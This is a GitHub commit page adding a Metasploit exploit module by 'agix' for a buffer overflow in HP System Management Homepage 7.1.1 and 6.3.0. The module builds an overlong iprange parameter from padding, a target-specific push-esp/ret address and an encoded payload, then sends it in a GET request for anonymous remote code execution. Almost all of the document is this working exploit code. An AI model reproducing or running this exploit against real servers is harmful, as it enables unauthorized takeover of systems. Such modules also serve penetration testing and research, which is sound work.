Skip to content

Commit 4bcadaa

Browse files
author
agix
committed
hp system management homepage DataValidation?iprange buffer overflow
1 parent 69fb465 commit 4bcadaa

File tree

1 file changed

+68
-0
lines changed

1 file changed

+68
-0
lines changed
Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
##
2+
# This file is part of the Metasploit Framework and may be subject to
3+
# redistribution and commercial restrictions. Please see the Metasploit
4+
# web site for more information on licensing and terms of use.
5+
# http://metasploit.com/
6+
##
7+
8+
require 'msf/core'
9+
10+
class Metasploit3 < Msf::Exploit::Remote
11+
Rank = AverageRanking
12+
13+
include Msf::Exploit::Remote::HttpClient
14+
15+
def initialize(info = {})
16+
super(update_info(info,
17+
'Name' => 'HP System Management anonymous access Code execution',
18+
'Description' => %q{
19+
This module exploits an anonymous remote code execution on hp system management 7.1.1 and inferior.
20+
},
21+
'Author' => [ 'agix' ],
22+
'License' => MSF_LICENSE,
23+
'Payload' =>
24+
{
25+
'DisableNops' => true,
26+
'Space' => 1000,
27+
'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20",
28+
},
29+
'Platform' => ['linux'],
30+
'Arch' => ARCH_X86,
31+
'Targets' => [
32+
33+
[ 'HP System Management 7.1.1',
34+
{
35+
'Ret' => 0x8054e14, # push esp / ret
36+
}
37+
],
38+
[ 'HP System Management 6.3.0',
39+
{
40+
'Ret' => 0x805a547, # push esp / ret
41+
}
42+
]
43+
44+
],
45+
'DefaultTarget' => 0))
46+
47+
end
48+
49+
def exploit
50+
51+
padding = "z"*267
52+
ret = [target['Ret']].pack('V')
53+
uri = "/proxy/DataValidation?iprange=a-bz"+padding+ret+payload.encoded
54+
puts uri.inspect()
55+
print_status("Sending #{uri.length} bytes payload...")
56+
57+
res = send_request_raw({
58+
'method' => 'GET',
59+
'uri' => uri,
60+
'version' => '1.1',
61+
'vhost' => rhost
62+
})
63+
64+
65+
handler
66+
end
67+
68+
end

0 commit comments

Comments
 (0)